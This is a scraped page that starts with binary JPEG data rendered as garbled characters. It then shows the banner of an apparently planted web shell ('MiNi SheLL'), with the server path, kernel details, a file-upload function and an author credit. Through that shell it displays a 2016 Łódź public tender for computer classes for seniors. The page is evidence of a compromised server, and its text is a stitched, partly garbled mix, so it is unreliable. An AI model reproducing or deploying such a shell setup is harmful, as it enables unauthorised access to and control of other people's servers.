JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160616/90423-N-2016.html

<p class="kh_header"><b>Łódź: Przeprowadzenie zajęć z podstaw obsługi komputera i praktycznego wykorzystania
Internetu dla pensjonariuszy Domów Dziennego Pobytu Miejskiego Ośrodka Pomocy Społecznej w Łodzi oraz wyłonienie wśród uczestników zajęć minimum jednego lidera do przekazywania wiedzy na temat wykorzystania technik informatycznych innym seniorom.</b><br>
<b>Numer ogłoszenia: 90423 - 2016; data zamieszczenia: 16.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uml.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć z podstaw obsługi komputera i praktycznego wykorzystania
Internetu dla pensjonariuszy Domów Dziennego Pobytu Miejskiego Ośrodka Pomocy Społecznej w Łodzi oraz wyłonienie wśród uczestników zajęć minimum jednego lidera do przekazywania wiedzy na temat wykorzystania technik informatycznych innym seniorom..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest przeprowadzenie zajęć z podstaw obsługi komputera
i praktycznego wykorzystania Internetu dla pensjonariuszy Domów Dziennego Pobytu Miejskiego Ośrodka Pomocy Społecznej w Łodzi oraz wyłonienie wśród uczestników zajęć minimum jednego lidera do przekazywania wiedzy na temat wykorzystania technik informatycznych innym seniorom.
Program szkolenia obejmuje następujące zagadnienia  
omówienie podstawowych pojęć specjalistycznych niezbędnych do zrozumienia treści objętych programem szkolenia  mysz, klawiatura, ekran, pulpit, ikona, kursor, plik,  folder, dysk, okno, logowanie, pulpit, kliknięcie, pasek menu, adres mailowy, 
nauka pisania klawisze enter, alt, shift, ctrl, tab, caps look, klawiatura numeryczna, podstawowe skróty klawiaturowe, 
opcje ułatwień lupa, zwiększenie kursora, ikonki,
system operacyjny komputera,
organizację zapisu w systemie WINDOWS 8, WINDOWS 7, WINDOWS XP,
operacje na plikach i folderach,
korzystanie z menu i podstawowych pasków narzędzi,
obsługa edytora tekstu,
obsługa komunikatorów Skype, GG, i innych
obsługa Internetu, poczty mailowej, aukcji internetowych, bankowości,
obsługa programów pakietu Office  Word lub Open Office.
W trakcie szkolenia uczestnik powinien nabyć umiejętności posługiwania się pocztą
e-mail, komunikatorem Skype, przeglądania, wstawiania na YouTube, korzystania
z portalu allegro, regulowania należności i zobowiązań finansowych, czytania e-książek, korzystania z gier on-line, oglądania filmów, przesyłania e-deklaracji.
Zajęcia będą prowadzone na sprzęcie komputerowym pozostającym na wyposażeniu domów dziennego pobytu - komputery przenośne z wbudowanym systemem operacyjnym Windows 8. W przypadku niewystarczającej liczby komputerów (w domach znajdują się 2 do 4 urządzeń) wykonawca zapewnia urządzenia z odpowiednim oprogramowaniem we własnym zakresie. 
Zajęcia będą prowadzone z wykorzystaniem prezentacji multimedialnych dotyczących omawianych zagadnień. Wykonawca zapewnia sprzęt audiowizualny, rzutniki multimedialny i ekran projekcyjny lub tablicę interaktywną.
Organizacja zajęć zajęcia muszą być realizowane w placówkach wskazanych przez Zamawiającego, w wymiarze  minimum 4 godzin edukacyjnych tygodniowo w każdym z Domów Dziennego Pobytu, 40 spotkań po 2 godziny w każdym domu, łącznie 1440 godzin zajęć. Zamawiający wymaga, aby każdy uczestnik w trakcie szkolenia miał zapewniony indywidualny dostęp do komputera przenośnego.
Przez pojęcie jednej godziny edukacyjnej należy rozumieć godzinę lekcyjną 45minut, przerwy nie wlicza się do czasu trwania zajęć, jedna przerwa 15 minutowa.
Szkolenia muszą zostać zrealizowane zgodnie z następującymi zasadami
zajęcia muszą odbywać się od poniedziałku do piątku, nie więcej niż 2 godziny lekcyjne dziennie zajęć, z wyłączeniem godzin od 11.45 do 13.30,
wykonawca opracuje przed podpisaniem umowy harmonogram zajęć zawierający w szczególności rozbicie na poszczególne dni, godziny i  bloki tematyczne wraz z podaniem nazwisk osób prowadzących poszczególne zajęcia, harmonogram wymaga akceptacji Zamawiającego.
Wykonawca jest zobowiązany do prowadzenia nadzoru wewnętrznego służącego podnoszeniu jakości realizowanych zajęć.
Wykonawca jest zobowiązany do wydania uczestnikom zajęć, którzy je ukończą zaświadczeń, w tym zaświadczeń dla liderów wykorzystania technik informatycznych.
Wykonawca jest zobowiązany do prowadzenia następującej dokumentacji 
a) listy obecności,
b) rejestru wydanych zaświadczeń potwierdzających udział w zajęciach,
c) rejestru zaświadczeń potwierdzających nabycie umiejętności lidera wykorzystania technik informatycznych dla co najmniej jednego seniora w każdym z domów dziennego pobytu.
Zajęcia muszą być przeprowadzone z trenerem, posiadającym kwalifikacje.
Nie dopuszcza się   prowadzenia zajęć drogą elektroniczną, metodą e-lerningu, 
w formie eksternistycznej.
Wykonawca zobowiązany jest wyznaczyć osobę/y prowadzącą/e nadzór wewnętrzny nad realizacją umowy oraz do bezpośredniego kontaktowania się z Zamawiającym.
Zamawiający ma prawo do kontroli realizacji usługi.
Zamawiający wymaga, aby zajęcia przeprowadzone były we wskazanych przez Zamawiającego lokalizacjach na terenie miasta Łodzi
Dom Dziennego Pobytu, ul. Rojna 52
Dom Dziennego Pobytu, ul. Wrocławska 10
Dom Dziennego Pobytu, ul. Organizacji WiN 37
Dom Dziennego Pobytu, ul. Borowa 6
Dom Dziennego Pobytu, ul. Narutowicza 37
Dom Dziennego Pobytu, ul. Jaracza 36
Dom Dziennego Pobytu, ul. Ćwiklińskiej 18
Dom Dziennego Pobytu, ul. Grota-Roweckiego 30
Dom Dziennego Pobytu, ul. Smetany 4
Dom Dziennego Pobytu, ul. Zbocze 2a
Dom Dziennego Pobytu funkcjonujący w ramach Domu Międzypokoleniowego Bednarska,  ul. Bednarska 15 a
Dom Dziennego Pobytu, ul. Lelewela 17
Dom Dziennego Pobytu, ul. Obywatelska 69
Dom Dziennego Pobytu, ul. 1 Maja 24 26
Dom Dziennego Pobytu, ul. Kościuszki 29
Dom Dziennego Pobytu, ul. Piotrkowska 203 205
Dom Dziennego Pobytu, ul. Fabryczna 19
Dom Dziennego Pobytu funkcjonujący w ramach Domu Pomocy Społecznej Włókniarz,
ul. Krzemieniecka 7 9.
Cena, podana przez Wykonawcę, nie ulegnie zmianie przez cały okres obowiązywania umowy i nie ulegnie podwyższeniu.
Wypłata wynagrodzenia nastąpi po zrealizowaniu przedmiotu zamówienia w terminie 30 dni od dnia otrzymania prawidłowo wystawionej faktury dostarczonej do siedziby Zamawiającego.
Za dzień zapłaty przyjmuje się dzień wpływu środków na rachunek bankowy Wykonawcy.
W przypadku rażącego naruszenia warunków umowy przez Wykonawcę, Zamawiający zastrzega sobie prawo rozwiązania umowy bez wypowiedzenia.
Wymagania stawiane Wykonawcy
Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez Zamawiającego
z ustanowionym przedstawicielem Wykonawcy.
Wskazanie przez Wykonawcę numerów telefonów kontaktowych, numerów faksu i adresu poczty elektronicznej oraz innych ustaleń niezbędnych do sprawnego i terminowego wykonania zamówienia.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest, aby Wykonawca wykazał, że dysponuje co najmniej 4 osobami posiadającymi wykształcenie wyższe informatyczne i przeprowadzili co najmniej 1 usługę każdy z wykładowców, zgodną rodzajowo z przedmiotem zamówienia dla osób w wieku powyżej 50 lat.     
Uszczegółowienie
Warunek zostanie spełniony, jeżeli Wykonawca potwierdzi jego spełnienie poprzez złożenie oświadczenia wzór, załącznik nr 2 do SIWZ oraz załączy do oferty wykaz - informację o  dysponowaniu  co najmniej 4  osobami, które posiadają kwalifikacje, doświadczenie i przeprowadziły co najmniej 1 usługę szkoleniową każdy z wykładowców, a w przypadku szkoleń okresowych lub ciągłych również wykonuje, co najmniej 1 szkolenie, z tematyki związanej z przedmiotem zamówienia dla osób w wieku powyżej 50 lat wzór, załącznik nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca polega na zasobach innych podmiotów na zasadach
określonych w art. 26 ust. 2 b ustawy Prawo zamówień publicznych zobowiązany jest udowodnić
Zamawiającemu, iż będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia. 
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia, zdolności finansowe lub ekonomiczne innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków, zobowiązany jest udowodnić Zamawiającymi, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych  podmiotów do oddania mu do  dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy, ubiegającemu się o zamówienie odpowiedniego zasobu oraz wskazywać
jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu
w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę,  przy wykonywaniu zamówienia
jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem
jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia.
Jeżeli Wykonawca wykazuje spełnianie warunków o których mowa w art.22 ust. 1 polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczeń o  braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust 1 ustawy Prawo zamówień publicznych załącznik nr 3. 
wykaz usług wzór załącznik nr 6 do SIWZ, wraz z dokumentami potwierdzającymi należyte wykonanie tych usług.
Dokument określający zasady reprezentacji oraz osoby uprawnione do  reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik  także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ilość wykonanych usług w okresie od 1.01.2013 r. do dnia 31.12.2015 r.  o tym samym charakterze co przedmiot zamówienia - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zgodnie z art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tekst jednolity Dz. U. z 2015 r. poz. 2164, niżej wymienione zmiany
dokonanie zmiany wykładowcy po podpisaniu umowy, pod warunkiem, że nowo wskazany wykładowca  będzie posiadał doświadczenie nie mniejsze niż doświadczenie wykładowcy, którego zastąpi
dokonania zmiany harmonogramu po podpisaniu umowy, w przypadku wystąpienia przyczyn niezależnych od Wykonawcy i Zamawiającego
dokonania zmiany terminu realizacji zajęć po podpisaniu umowy, w przypadku wystąpienia przyczyn niezależnych od Zamawiającego i Wykonawcy
uzasadniony wniosek Wykonawcy, Zamawiającego. Dokonywanie zmian jest możliwe o ile wynika to
z okoliczności, których, pomimo zachowania należytej staranności, nie można było przewidzieć w chwili zawarcia umowy i zmiany takie są niezależne od woli stron umowy lub są korzystne dla Zamawiającego
dokonanie zmiany w przypadku zmiany stawki podatku VAT.
Zmiany wynikające z wystąpienia przyczyn losowych niezależnych od Wykonawcy
i Zamawiającego mogą zostać wniesione po podpisaniu umowy za wcześniejszą pisemną zgodą obu stron. 
Wykonawca ma obowiązek poinformować Zamawiającego o zaistniałej przyczynie losowej najpóźniej w dniu jej wystąpienia, a w sytuacji gdy jest to dzień wolny od pracy  w kolejnym dniu roboczym po dniu wolnym. Zamawiający ma obowiązek poinformować Wykonawcę o zaistniałej przyczynie losowej najpóźniej w dniu jej wystąpienia, a w sytuacji gdy jest to dzień wolny od pracy w kolejnym dniu roboczym po dniu wolnym.
W przypadku zmiany stawki VAT dopuszcza się możliwość zmiany w zakresie kwoty VAT i kwoty wynagrodzenia brutto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uml.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi 90-012 Łódź ul. Kilińskiego 102 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łodzi 90-012 Łódź ul. Kilińskiego 102 102a
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com